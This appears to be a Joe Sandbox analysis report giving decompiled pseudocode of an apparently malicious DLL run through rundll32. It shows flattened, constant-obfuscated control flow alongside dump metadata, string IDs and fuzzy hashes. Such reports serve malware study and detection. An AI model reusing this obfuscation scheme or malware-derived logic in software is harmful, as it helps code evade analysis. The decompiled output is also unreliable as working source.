                                                                                                                      				_v1688 = _v1688 / _t433;
                                                                                                                      				_v1688 = _v1688 | 0x51e7f8f6;
                                                                                                                      				_v1688 = _v1688 << 0xb;
                                                                                                                      				_v1688 = _v1688 ^ 0x3fc44495;
                                                                                                                      				_v1704 = 0x876d58;
                                                                                                                      				_v1704 = _v1704 + 0x4bbd;
                                                                                                                      				_v1704 = _v1704 ^ 0xe392f1ca;
                                                                                                                      				_v1704 = _v1704 << 5;
                                                                                                                      				_v1704 = _v1704 ^ 0x62a598c6;
                                                                                                                      				_v1636 = 0x545e02;
                                                                                                                      				_v1636 = _v1636 + 0xcb63;
                                                                                                                      				_v1636 = _v1636 << 5;
                                                                                                                      				_v1636 = _v1636 ^ 0x0aae6d2b;
                                                                                                                      				_v1612 = 0x26c885;
                                                                                                                      				_v1612 = _v1612 | 0x5f90e8de;
                                                                                                                      				_t434 = 0x66;
                                                                                                                      				_v1612 = _v1612 * 0x52;
                                                                                                                      				_v1612 = _v1612 ^ 0xa89ce640;
                                                                                                                      				_v1576 = 0x171d42;
                                                                                                                      				_v1576 = _v1576 ^ 0x4acb7e15;
                                                                                                                      				_v1576 = _v1576 ^ 0x4adecc08;
                                                                                                                      				_v1660 = 0xcbbc2;
                                                                                                                      				_v1660 = _v1660 >> 8;
                                                                                                                      				_v1660 = _v1660 / _t434;
                                                                                                                      				_v1660 = _v1660 ^ 0x3398a9eb;
                                                                                                                      				_v1660 = _v1660 ^ 0x33921795;
                                                                                                                      				_v1608 = 0x5e75bf;
                                                                                                                      				_v1608 = _v1608 + 0xa7f5;
                                                                                                                      				_v1608 = _v1608 >> 1;
                                                                                                                      				_v1608 = _v1608 ^ 0x002982b8;
                                                                                                                      				_v1584 = 0x10acd4;
                                                                                                                      				_v1584 = _v1584 + 0x75ec;
                                                                                                                      				_v1584 = _v1584 ^ 0x001a134d;
                                                                                                                      				_v1616 = 0x7387ff;
                                                                                                                      				_v1616 = _v1616 | 0x122d515f;
                                                                                                                      				_v1616 = _v1616 + 0xffffa5db;
                                                                                                                      				_v1616 = _v1616 ^ 0x12702e1c;
                                                                                                                      				L1:
                                                                                                                      				while(_t386 != 0x283f0d8) {
                                                                                                                      					if(_t386 == 0xc593167) {
                                                                                                                      						_push(_v1700);
                                                                                                                      						_push(_v1572);
                                                                                                                      						_push(0x2b10fc);
                                                                                                                      						_t361 = E002BAB66(_v1692, _v1620, __eflags);
                                                                                                                      						E002CC66E( &_v1560, __eflags);
                                                                                                                      						_t365 =  *0x2d520c; // 0x0
                                                                                                                      						_t367 =  *0x2d520c; // 0x0
                                                                                                                      						E002CBDB5( &_v520, __eflags, _v1684, _v1656, _v1652, _v1580, _t367 + 0x220, _v1564, _v1588, _t365 + 8,  &_v1560,  &_v1040, _t361);
                                                                                                                      						E002BAE03(_v1676, _v1632, _v1640, _t361);
                                                                                                                      						_t439 =  &(_t439[0x10]);
                                                                                                                      						L8:
                                                                                                                      						_t386 = 0xe92714c;
                                                                                                                      						continue;
                                                                                                                      					}
                                                                                                                      					if(_t386 == 0xd2f347e) {
                                                                                                                      						_push(_v1680);
                                                                                                                      						_push(_v1648);
                                                                                                                      						_push(0x2b121c);
                                                                                                                      						_t371 = E002BAB66(_v1664, _v1696, __eflags);
                                                                                                                      						E002CC66E( &_v1560, __eflags);
                                                                                                                      						_t373 =  *0x2d520c; // 0x0
                                                                                                                      						_t376 =  *0x2d520c; // 0x0
                                                                                                                      						__eflags = 0;
                                                                                                                      						E002B5F83(_v1596, 0, _v1604,  &_v520,  &_v1560, _v1644, _v1672,  &_v1560, _t376 + 0x220, _v1628,  &_v1040, _t373 + 8, _v1688, _t371);
                                                                                                                      						E002BAE03(_v1704, _v1636, _v1612, _t371);
                                                                                                                      						_t439 =  &(_t439[0x11]);
                                                                                                                      						goto L8;
                                                                                                                      					}
                                                                                                                      					if(_t386 == 0xe92714c) {
                                                                                                                      						_push(_v1616);
                                                                                                                      						_push(_v1584);
                                                                                                                      						_push(_v1608);
                                                                                                                      						_push(_t425);
                                                                                                                      						_push(_t425);
                                                                                                                      						_push(_v1660);
                                                                                                                      						_push(_t386);
                                                                                                                      						_push(_t425);
                                                                                                                      						__eflags = E002B9700( &_v520, _v1576, __eflags);
                                                                                                                      						_t425 =  !=  ? 1 : _t425;
                                                                                                                      					} else {
                                                                                                                      						if(_t386 != 0x3c91f62) {
                                                                                                                      							continue;
                                                                                                                      						} else {
                                                                                                                      						}
                                                                                                                      					}
                                                                                                                      					return _t425;
                                                                                                                      				}
                                                                                                                      				_push(_t386);
                                                                                                                      				E002BEA7B( &_v1040, _v1624, _v1592, _t386, _v1600, _v1568, _v1668);
                                                                                                                      				_t439 =  &(_t439[7]);
                                                                                                                      				_t386 = 0xc593167;
                                                                                                                      				goto L1;
                                                                                                                      			}






























































                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: c$:Y($Qd$}Z$~4/$u
                                                                                                                      • API String ID: 0-1069939785
                                                                                                                      • Opcode ID: 7ad28798e062714ce471641c68105b026c1529577938eef0f07933fb99bff7f7
                                                                                                                      • Instruction ID: 4b0167882df0556718d69ff8fae69de9a971716504ad68dde6fe174749180727
                                                                                                                      • Opcode Fuzzy Hash: 7ad28798e062714ce471641c68105b026c1529577938eef0f07933fb99bff7f7
                                                                                                                      • Instruction Fuzzy Hash: 30F101725183809FD368CF21C94AA9BFBE1FBC5748F10891DF29A96260C7B58919CF53
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 95%
                                                                                                                      			E002D0D5B() {
                                                                                                                      				void* _t279;
                                                                                                                      				signed char _t284;
                                                                                                                      				intOrPtr _t294;
                                                                                                                      				signed int _t296;
                                                                                                                      				signed int _t302;
                                                                                                                      				signed char _t309;
                                                                                                                      				intOrPtr _t310;
                                                                                                                      				void* _t311;
                                                                                                                      				signed short _t340;
                                                                                                                      				signed int _t341;
                                                                                                                      				intOrPtr _t342;
                                                                                                                      				signed int _t346;
                                                                                                                      				signed int _t349;
                                                                                                                      				signed int _t350;
                                                                                                                      				signed int _t351;
                                                                                                                      				signed int _t352;
                                                                                                                      				signed int _t353;
                                                                                                                      				signed int _t354;
                                                                                                                      				signed int _t355;
                                                                                                                      				signed short* _t359;
                                                                                                                      				void* _t361;
                                                                                                                      
                                                                                                                      				 *(_t361 + 0x80) =  *(_t361 + 0x80) & 0x00000000;
                                                                                                                      				 *(_t361 + 0x74) = 0x716487;
                                                                                                                      				_t302 = 0x4e9f10f;
                                                                                                                      				 *(_t361 + 0x78) = 0xba6397;
                                                                                                                      				 *(_t361 + 0x7c) = 0x705fb8;
                                                                                                                      				 *(_t361 + 0x68) = 0x4c092e;
                                                                                                                      				_t7 = _t361 + 0x68; // 0x4c092e
                                                                                                                      				_t349 = 5;
                                                                                                                      				 *(_t361 + 0x7c) =  *_t7 / _t349;
                                                                                                                      				 *(_t361 + 0x7c) =  *(_t361 + 0x7c) ^ 0x0003a2ba;
                                                                                                                      				 *(_t361 + 0x64) = 0x751de4;
                                                                                                                      				 *(_t361 + 0x64) =  *(_t361 + 0x64) + 0xffff6a51;
                                                                                                                      				 *(_t361 + 0x64) =  *(_t361 + 0x64) ^ 0x007ee7f9;
                                                                                                                      				 *(_t361 + 0x44) = 0x9fd9a3;
                                                                                                                      				 *(_t361 + 0x44) =  *(_t361 + 0x44) << 6;
                                                                                                                      				 *(_t361 + 0x44) =  *(_t361 + 0x44) << 4;
                                                                                                                      				 *(_t361 + 0x44) =  *(_t361 + 0x44) ^ 0x7f6c4ffb;
                                                                                                                      				 *(_t361 + 0x28) = 0x22a0e;
                                                                                                                      				 *(_t361 + 0x28) =  *(_t361 + 0x28) >> 0xb;
                                                                                                                      				 *(_t361 + 0x28) =  *(_t361 + 0x28) + 0x788;
                                                                                                                      				_t350 = 0x41;
                                                                                                                      				 *(_t361 + 0x28) =  *(_t361 + 0x28) * 0x62;
                                                                                                                      				 *(_t361 + 0x28) =  *(_t361 + 0x28) ^ 0x000a9bb9;
                                                                                                                      				 *(_t361 + 0x20) = 0xda6f7f;
                                                                                                                      				 *(_t361 + 0x20) =  *(_t361 + 0x20) * 0x62;
                                                                                                                      				 *(_t361 + 0x20) =  *(_t361 + 0x20) * 7;
                                                                                                                      				 *(_t361 + 0x20) =  *(_t361 + 0x20) << 0xa;
                                                                                                                      				 *(_t361 + 0x20) =  *(_t361 + 0x20) ^ 0x5b1b1cce;
                                                                                                                      				 *(_t361 + 0x74) = 0x2b9064;
                                                                                                                      				 *(_t361 + 0x74) =  *(_t361 + 0x74) + 0x7c5a;
                                                                                                                      				 *(_t361 + 0x74) =  *(_t361 + 0x74) ^ 0x002a32d7;
                                                                                                                      				 *(_t361 + 0x5c) = 0xcbc6c3;
                                                                                                                      				 *(_t361 + 0x5c) =  *(_t361 + 0x5c) * 0x12;
                                                                                                                      				 *(_t361 + 0x5c) =  *(_t361 + 0x5c) ^ 0x0e5c6d3d;
                                                                                                                      				 *(_t361 + 0x40) = 0xfaf28f;
                                                                                                                      				 *(_t361 + 0x40) =  *(_t361 + 0x40) ^ 0x36c89793;
                                                                                                                      				 *(_t361 + 0x40) =  *(_t361 + 0x40) | 0x5dfe35bf;
                                                                                                                      				 *(_t361 + 0x40) =  *(_t361 + 0x40) ^ 0x7ff1266d;
                                                                                                                      				 *(_t361 + 0x3c) = 0x71501;
                                                                                                                      				 *(_t361 + 0x3c) =  *(_t361 + 0x3c) ^ 0x7d526c09;
                                                                                                                      				 *(_t361 + 0x3c) =  *(_t361 + 0x3c) | 0x29ca113d;
                                                                                                                      				 *(_t361 + 0x3c) =  *(_t361 + 0x3c) ^ 0x7dd950c2;
                                                                                                                      				 *(_t361 + 0x78) = 0x2c4b29;
                                                                                                                      				 *(_t361 + 0x78) =  *(_t361 + 0x78) ^ 0xa68b4193;
                                                                                                                      				 *(_t361 + 0x78) =  *(_t361 + 0x78) ^ 0xa6a148a4;
                                                                                                                      				 *(_t361 + 0x50) = 0xa9eb43;
                                                                                                                      				 *(_t361 + 0x50) =  *(_t361 + 0x50) << 4;
                                                                                                                      				 *(_t361 + 0x50) =  *(_t361 + 0x50) ^ 0x0a966e12;
                                                                                                                      				 *(_t361 + 0x24) = 0xf29fdf;
                                                                                                                      				 *(_t361 + 0x24) =  *(_t361 + 0x24) / _t350;
                                                                                                                      				 *(_t361 + 0x24) =  *(_t361 + 0x24) | 0x702811c1;
                                                                                                                      				 *(_t361 + 0x24) =  *(_t361 + 0x24) ^ 0xfde5eea1;
                                                                                                                      				 *(_t361 + 0x24) =  *(_t361 + 0x24) ^ 0x8dc07913;
                                                                                                                      				 *(_t361 + 0x48) = 0x26e009;
                                                                                                                      				 *(_t361 + 0x48) =  *(_t361 + 0x48) ^ 0xd6899262;
                                                                                                                      				 *(_t361 + 0x48) =  *(_t361 + 0x48) << 1;
                                                                                                                      				 *(_t361 + 0x48) =  *(_t361 + 0x48) ^ 0xad52b6d6;
                                                                                                                      				 *(_t361 + 0x1c) = 0xb261a6;
                                                                                                                      				 *(_t361 + 0x1c) =  *(_t361 + 0x1c) + 0x753a;
                                                                                                                      				_t351 = 0x3f;
                                                                                                                      				 *(_t361 + 0x18) =  *(_t361 + 0x1c) / _t351;
                                                                                                                      				 *(_t361 + 0x18) =  *(_t361 + 0x18) + 0xffffc68f;
                                                                                                                      				 *(_t361 + 0x18) =  *(_t361 + 0x18) ^ 0x00055965;
                                                                                                                      				 *(_t361 + 0x10) = 0xb29e6;
                                                                                                                      				 *(_t361 + 0x10) =  *(_t361 + 0x10) ^ 0xf1ef7176;
                                                                                                                      				_t352 = 0x53;
                                                                                                                      				_t346 =  *(_t361 + 0x80);
                                                                                                                      				 *(_t361 + 0x14) =  *(_t361 + 0x10) * 0x52;
                                                                                                                      				 *(_t361 + 0x14) =  *(_t361 + 0x14) + 0xffff3d5f;
                                                                                                                      				 *(_t361 + 0x14) =  *(_t361 + 0x14) ^ 0x7b287ee9;
                                                                                                                      				 *(_t361 + 0x6c) = 0xc2349f;
                                                                                                                      				_t359 =  *(_t361 + 0x80);
                                                                                                                      				 *(_t361 + 0x6c) =  *(_t361 + 0x6c) * 0x2b;
                                                                                                                      				 *(_t361 + 0x6c) =  *(_t361 + 0x6c) ^ 0x209b01de;
                                                                                                                      				 *(_t361 + 0x30) = 0xecc1f5;
                                                                                                                      				 *(_t361 + 0x30) =  *(_t361 + 0x30) ^ 0x10955a53;
                                                                                                                      				 *(_t361 + 0x30) =  *(_t361 + 0x30) | 0x79713791;
                                                                                                                      				 *(_t361 + 0x30) =  *(_t361 + 0x30) / _t352;
                                                                                                                      				 *(_t361 + 0x30) =  *(_t361 + 0x30) ^ 0x017289e0;
                                                                                                                      				 *(_t361 + 0x58) = 0x8daaf;
                                                                                                                      				_t353 = 0xe;
                                                                                                                      				 *(_t361 + 0x58) =  *(_t361 + 0x58) / _t353;
                                                                                                                      				 *(_t361 + 0x58) =  *(_t361 + 0x58) ^ 0x00025281;
                                                                                                                      				 *(_t361 + 0x54) = 0x82784e;
                                                                                                                      				 *(_t361 + 0x54) =  *(_t361 + 0x54) | 0x1fcf3d57;
                                                                                                                      				 *(_t361 + 0x54) =  *(_t361 + 0x54) ^ 0x1fc5386b;
                                                                                                                      				 *(_t361 + 0x2c) = 0xdcbbf5;
                                                                                                                      				 *(_t361 + 0x2c) =  *(_t361 + 0x2c) >> 0xa;
                                                                                                                      				 *(_t361 + 0x2c) =  *(_t361 + 0x2c) >> 2;
                                                                                                                      				 *(_t361 + 0x2c) =  *(_t361 + 0x2c) + 0xffff64c3;
                                                                                                                      				 *(_t361 + 0x2c) =  *(_t361 + 0x2c) ^ 0xfffe0972;
                                                                                                                      				 *(_t361 + 0x70) = 0xf032c2;
                                                                                                                      				 *(_t361 + 0x70) =  *(_t361 + 0x70) + 0xffff1f36;
                                                                                                                      				 *(_t361 + 0x70) =  *(_t361 + 0x70) ^ 0x00e5c56e;
                                                                                                                      				 *(_t361 + 0x38) = 0xb1df5b;
                                                                                                                      				 *(_t361 + 0x38) =  *(_t361 + 0x38) << 0xe;
                                                                                                                      				 *(_t361 + 0x38) =  *(_t361 + 0x38) << 0xa;
                                                                                                                      				 *(_t361 + 0x38) =  *(_t361 + 0x38) ^ 0x5b06c733;
                                                                                                                      				 *(_t361 + 0x18) = 0x22b4d7;
                                                                                                                      				 *(_t361 + 0x18) =  *(_t361 + 0x18) ^ 0x9a622f3f;
                                                                                                                      				 *(_t361 + 0x18) =  *(_t361 + 0x18) + 0xcb3c;
                                                                                                                      				_t354 = 0x1f;
                                                                                                                      				 *(_t361 + 0x18) =  *(_t361 + 0x18) / _t354;
                                                                                                                      				 *(_t361 + 0x18) =  *(_t361 + 0x18) ^ 0x04f5d5b3;
                                                                                                                      				 *(_t361 + 0x34) = 0xa6176b;
                                                                                                                      				_t355 = 0x3b;
                                                                                                                      				 *(_t361 + 0x30) =  *(_t361 + 0x34) / _t355;
                                                                                                                      				 *(_t361 + 0x30) =  *(_t361 + 0x30) >> 0xb;
                                                                                                                      				 *(_t361 + 0x30) =  *(_t361 + 0x30) + 0xffffd9a6;
                                                                                                                      				 *(_t361 + 0x30) =  *(_t361 + 0x30) ^ 0xfffb162a;
                                                                                                                      				while(1) {
                                                                                                                      					L1:
                                                                                                                      					L2:
                                                                                                                      					while(1) {
                                                                                                                      						while(_t302 != 0xb6d0a5) {
                                                                                                                      							if(_t302 == 0x1c75f00) {
                                                                                                                      								_push(_t302);
                                                                                                                      								_push(_t302);
                                                                                                                      								_t311 = 0x68;
                                                                                                                      								_t359 = E002C3512(_t311);
                                                                                                                      								__eflags = _t359;
                                                                                                                      								if(__eflags != 0) {
                                                                                                                      									_t302 = 0xb6d0a5;
                                                                                                                      									goto L17;
                                                                                                                      								}
                                                                                                                      							} else {
                                                                                                                      								if(_t302 == 0x4e9f10f) {
                                                                                                                      									_t342 =  *0x2d5214; // 0x0
                                                                                                                      									_t302 = 0x8016e2b;
                                                                                                                      									_t341 = _t342 + 4;
                                                                                                                      									goto L12;
                                                                                                                      								} else {
                                                                                                                      									if(_t302 == 0x6570a92) {
                                                                                                                      										_t294 =  *0x2d5214; // 0x0
                                                                                                                      										_t302 = 0xe9e8905;
                                                                                                                      										 *_t341 = _t359;
                                                                                                                      										_t212 =  &(_t359[0x2c]); // 0x58
                                                                                                                      										_t341 = _t212;
                                                                                                                      										_t213 = _t294 + 0x44;
                                                                                                                      										 *_t213 =  *(_t294 + 0x44) + 1;
                                                                                                                      										__eflags =  *_t213;
                                                                                                                      										L12:
                                                                                                                      										 *(_t361 + 0x5c) = _t341;
                                                                                                                      										goto L13;
                                                                                                                      									} else {
                                                                                                                      										if(_t302 == 0x8016e2b) {
                                                                                                                      											_t296 = E002CEAE6(0x2d5000,  *((intOrPtr*)(_t361 + 0x88)), __eflags,  *(_t361 + 0x6c),  *(_t361 + 0x48), _t361 + 0x84,  *(_t361 + 0x24));
                                                                                                                      											_t361 = _t361 + 0x10;
                                                                                                                      											 *(_t361 + 0x7c) = _t296;
                                                                                                                      											_t346 = _t296;
                                                                                                                      											_t302 = 0x1c75f00;
                                                                                                                      											 *(_t361 + 0x64) = _t296 +  *(_t361 + 0x80);
                                                                                                                      											goto L1;
                                                                                                                      										} else {
                                                                                                                      											if(_t302 == 0x8020f8f) {
                                                                                                                      												E002B68DE( *(_t361 + 0x78),  *(_t361 + 0x40),  *(_t361 + 0x1c),  *(_t361 + 0x34),  *(_t361 + 0x7c));
                                                                                                                      											} else {
                                                                                                                      												if(_t302 != 0xe9e8905) {
                                                                                                                      													L19:
                                                                                                                      													__eflags = _t302 - 0x718ec4e;
                                                                                                                      													if(__eflags != 0) {
                                                                                                                      														L17:
                                                                                                                      														_t341 =  *(_t361 + 0x5c);
                                                                                                                      														L13:
                                                                                                                      														continue;
                                                                                                                      													}
                                                                                                                      												} else {
                                                                                                                      													asm("sbb ecx, ecx");
                                                                                                                      													_t302 = (_t302 & 0xf9c54f71) + 0x8020f8f;
                                                                                                                      													continue;
                                                                                                                      												}
                                                                                                                      											}
                                                                                                                      										}
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      							_t310 =  *0x2d5214; // 0x0
                                                                                                                      							 *(_t310 + 0x38) =  *(_t310 + 0x38) & 0x00000000;
                                                                                                                      							 *((intOrPtr*)(_t310 + 0x3c)) =  *((intOrPtr*)(_t310 + 4));
                                                                                                                      							__eflags = 1;
                                                                                                                      							return 1;
                                                                                                                      						}
                                                                                                                      						_push( *((intOrPtr*)(_t361 + 0x4c)));
                                                                                                                      						_push( *(_t361 + 0x78));
                                                                                                                      						 *((char*)(_t361 + 0x53)) =  *((intOrPtr*)(_t346 + 1));
                                                                                                                      						_push(0x2b134c);
                                                                                                                      						 *(_t361 + 0x56) =  *((intOrPtr*)(_t346 + 2));
                                                                                                                      						_t279 = E002BAB66( *(_t361 + 0x44),  *(_t361 + 0x40), __eflags);
                                                                                                                      						_t231 =  &(_t359[0x10]); // 0x20
                                                                                                                      						_push(_t279);
                                                                                                                      						E002CBDB5(_t231, __eflags, 0x10,  *(_t361 + 0x54),  *(_t361 + 0x74),  *(_t361 + 0x44),  *(_t361 + 0x38),  *(_t361 + 0x56) & 0x000000ff,  *((intOrPtr*)(_t361 + 0x88)),  *(_t361 + 0x48),  *(_t361 + 0x63) & 0x000000ff,  *(_t346 + 3) & 0x000000ff,  *(_t346 + 3) & 0x000000ff);
                                                                                                                      						E002BAE03( *((intOrPtr*)(_t361 + 0x94)),  *((intOrPtr*)(_t361 + 0x90)),  *(_t361 + 0x64), _t279);
                                                                                                                      						_t361 = _t361 + 0x40;
                                                                                                                      						 *_t359 = ( *(_t346 + 4) & 0x000000ff) << 0x00000008 |  *(_t346 + 5) & 0x000000ff;
                                                                                                                      						_t284 =  *((intOrPtr*)(_t346 + 6));
                                                                                                                      						_t309 =  *((intOrPtr*)(_t346 + 7));
                                                                                                                      						_t346 = _t346 + 8;
                                                                                                                      						_t302 = 0x6570a92;
                                                                                                                      						_t340 = (_t284 & 0x000000ff) << 0x00000008 | _t309 & 0x000000ff;
                                                                                                                      						__eflags = _t340;
                                                                                                                      						_t359[0x28] = _t340;
                                                                                                                      						goto L19;
                                                                                                                      					}
                                                                                                                      				}
                                                                                                                      			}
























                                                                                                                      0x002d125a
                                                                                                                      0x002d125a
                                                                                                                      0x002d125d
                                                                                                                      0x00000000
                                                                                                                      0x002d125d
                                                                                                                      0x002d10ad

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: lR}$&$.L$:u$Z|$~({
                                                                                                                      • API String ID: 0-2971758746
                                                                                                                      • Opcode ID: 1883e29f52db3f2b5c5d6ad4d7d82ab239e0cc61d9bfdf08a25d41be58f52993
                                                                                                                      • Instruction ID: a719ab0bde6c8ecee2597cc3ef63450f0cbbfb3e88941ba16744d3670f170527
                                                                                                                      • Opcode Fuzzy Hash: 1883e29f52db3f2b5c5d6ad4d7d82ab239e0cc61d9bfdf08a25d41be58f52993
                                                                                                                      • Instruction Fuzzy Hash: 96D16FB11183819FC368CF65C48995BBBE1FBC4748F108A1DF6DA8A260D3B5D959CF82
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 93%
                                                                                                                      			E002B2830() {
                                                                                                                      				char _v520;
                                                                                                                      				char _v1040;
                                                                                                                      				signed int _v1044;
                                                                                                                      				signed int _v1048;
                                                                                                                      				intOrPtr _v1052;
                                                                                                                      				signed int _v1056;
                                                                                                                      				signed int _v1060;
                                                                                                                      				signed int _v1064;
                                                                                                                      				signed int _v1068;
                                                                                                                      				signed int _v1072;
                                                                                                                      				signed int _v1076;
                                                                                                                      				signed int _v1080;
                                                                                                                      				signed int _v1084;
                                                                                                                      				signed int _v1088;
                                                                                                                      				signed int _v1092;
                                                                                                                      				signed int _v1096;
                                                                                                                      				signed int _v1100;
                                                                                                                      				signed int _v1104;
                                                                                                                      				signed int _v1108;
                                                                                                                      				signed int _v1112;
                                                                                                                      				signed int _v1116;
                                                                                                                      				signed int _v1120;
                                                                                                                      				signed int _v1124;
                                                                                                                      				signed int _v1128;
                                                                                                                      				unsigned int _v1132;
                                                                                                                      				signed int _v1136;
                                                                                                                      				signed int _v1140;
                                                                                                                      				signed int _v1144;
                                                                                                                      				signed int _v1148;
                                                                                                                      				signed int _v1152;
                                                                                                                      				signed int _v1156;
                                                                                                                      				signed int _v1160;
                                                                                                                      				signed int _v1164;
                                                                                                                      				signed int _v1168;
                                                                                                                      				void* _t307;
                                                                                                                      				void* _t311;
                                                                                                                      				void* _t312;
                                                                                                                      				void* _t314;
                                                                                                                      				signed int _t317;
                                                                                                                      				signed int _t318;
                                                                                                                      				signed int _t319;
                                                                                                                      				signed int _t320;
                                                                                                                      				signed int _t321;
                                                                                                                      				signed int _t322;
                                                                                                                      				intOrPtr _t332;
                                                                                                                      				intOrPtr _t334;
                                                                                                                      				intOrPtr _t354;
                                                                                                                      				void* _t361;
                                                                                                                      				signed int* _t365;
                                                                                                                      
                                                                                                                      				_t365 =  &_v1168;
                                                                                                                      				_v1048 = _v1048 & 0x00000000;
                                                                                                                      				_v1044 = _v1044 & 0x00000000;
                                                                                                                      				_v1052 = 0xd27b82;
                                                                                                                      				_v1132 = 0xd68ad;
                                                                                                                      				_t317 = 0x39;
                                                                                                                      				_t361 = 0x31951cf;
                                                                                                                      				_v1132 = _v1132 / _t317;
                                                                                                                      				_v1132 = _v1132 | 0x7a114e95;
                                                                                                                      				_v1132 = _v1132 >> 9;
                                                                                                                      				_v1132 = _v1132 ^ 0x003f4f84;
                                                                                                                      				_v1164 = 0x8948b3;
                                                                                                                      				_v1164 = _v1164 + 0x5689;
                                                                                                                      				_v1164 = _v1164 + 0xffffbb3a;
                                                                                                                      				_t318 = 0x19;
                                                                                                                      				_v1164 = _v1164 * 0x56;
                                                                                                                      				_v1164 = _v1164 ^ 0x2e2b97d6;
                                                                                                                      				_v1072 = 0xcb9c2b;
                                                                                                                      				_v1072 = _v1072 >> 3;
                                                                                                                      				_v1072 = _v1072 ^ 0x001ca36a;
                                                                                                                      				_v1080 = 0x1dbdae;
                                                                                                                      				_v1080 = _v1080 >> 8;
                                                                                                                      				_v1080 = _v1080 ^ 0x00014686;
                                                                                                                      				_v1156 = 0xb5510a;
                                                                                                                      				_v1156 = _v1156 / _t318;
                                                                                                                      				_v1156 = _v1156 ^ 0xc10914df;
                                                                                                                      				_v1156 = _v1156 | 0x9ca0ebe9;
                                                                                                                      				_v1156 = _v1156 ^ 0xdda118ad;
                                                                                                                      				_v1104 = 0x66b826;
                                                                                                                      				_v1104 = _v1104 ^ 0xe9987981;
                                                                                                                      				_v1104 = _v1104 * 0x25;
                                                                                                                      				_v1104 = _v1104 ^ 0xd1d8b52b;
                                                                                                                      				_v1056 = 0xa9a3d5;
                                                                                                                      				_v1056 = _v1056 * 0x6e;
                                                                                                                      				_v1056 = _v1056 ^ 0x48e0209e;
                                                                                                                      				_v1064 = 0xff8e1d;
                                                                                                                      				_v1064 = _v1064 + 0x7d6c;
                                                                                                                      				_v1064 = _v1064 ^ 0x0102ce02;
                                                                                                                      				_v1060 = 0x1cd25;
                                                                                                                      				_v1060 = _v1060 >> 0xe;
                                                                                                                      				_v1060 = _v1060 ^ 0x00092955;
                                                                                                                      				_v1112 = 0x2e454b;
                                                                                                                      				_v1112 = _v1112 ^ 0xdfc484a9;
                                                                                                                      				_v1112 = _v1112 << 4;
                                                                                                                      				_v1112 = _v1112 ^ 0xfea80718;
                                                                                                                      				_v1084 = 0x44c343;
                                                                                                                      				_v1084 = _v1084 * 0x5e;
                                                                                                                      				_v1084 = _v1084 ^ 0x99776358;
                                                                                                                      				_v1084 = _v1084 ^ 0x804f0a92;
                                                                                                                      				_v1148 = 0xd43471;
                                                                                                                      				_v1148 = _v1148 << 0x10;
                                                                                                                      				_v1148 = _v1148 ^ 0xf30ce1ba;
                                                                                                                      				_v1148 = _v1148 | 0x5684f5e4;
                                                                                                                      				_v1148 = _v1148 ^ 0xd7f82c28;
                                                                                                                      				_v1140 = 0xc6d087;
                                                                                                                      				_v1140 = _v1140 * 0xf;
                                                                                                                      				_v1140 = _v1140 / _t318;
                                                                                                                      				_t319 = 0x11;
                                                                                                                      				_v1140 = _v1140 / _t319;
                                                                                                                      				_v1140 = _v1140 ^ 0x000f807a;
                                                                                                                      				_v1076 = 0xeb33ff;
                                                                                                                      				_v1076 = _v1076 | 0x3caa7413;
                                                                                                                      				_v1076 = _v1076 ^ 0x3ce1a50e;
                                                                                                                      				_v1160 = 0xf6df2e;
                                                                                                                      				_v1160 = _v1160 << 3;
                                                                                                                      				_t320 = 0x12;
                                                                                                                      				_v1160 = _v1160 / _t320;
                                                                                                                      				_t321 = 0x23;
                                                                                                                      				_v1160 = _v1160 / _t321;
                                                                                                                      				_v1160 = _v1160 ^ 0x0001c97f;
                                                                                                                      				_v1096 = 0x2990f1;
                                                                                                                      				_v1096 = _v1096 + 0x8b3d;
                                                                                                                      				_v1096 = _v1096 << 4;
                                                                                                                      				_v1096 = _v1096 ^ 0x02a87cfa;
                                                                                                                      				_v1168 = 0x9204f1;
                                                                                                                      				_v1168 = _v1168 << 2;
                                                                                                                      				_v1168 = _v1168 >> 0xe;
                                                                                                                      				_v1168 = _v1168 ^ 0x6a27e144;
                                                                                                                      				_v1168 = _v1168 ^ 0x6a24f645;
                                                                                                                      				_v1068 = 0x63146e;
                                                                                                                      				_v1068 = _v1068 + 0xffffb906;
                                                                                                                      				_v1068 = _v1068 ^ 0x00673218;
                                                                                                                      				_v1124 = 0xa7a9d5;
                                                                                                                      				_v1124 = _v1124 * 0x43;
                                                                                                                      				_v1124 = _v1124 + 0xa631;
                                                                                                                      				_v1124 = _v1124 ^ 0x2beabd88;
                                                                                                                      				_v1144 = 0x5bd0aa;
                                                                                                                      				_v1144 = _v1144 * 6;
                                                                                                                      				_v1144 = _v1144 | 0x1ea27ebc;
                                                                                                                      				_v1144 = _v1144 + 0xffff7d79;
                                                                                                                      				_v1144 = _v1144 ^ 0x1eab8d23;
                                                                                                                      				_v1152 = 0x75499f;
                                                                                                                      				_v1152 = _v1152 >> 7;
                                                                                                                      				_v1152 = _v1152 * 0x3b;
                                                                                                                      				_v1152 = _v1152 * 0x36;
                                                                                                                      				_v1152 = _v1152 ^ 0x0b6e0547;
                                                                                                                      				_v1116 = 0xfc11ad;
                                                                                                                      				_v1116 = _v1116 ^ 0xa8b58fc5;
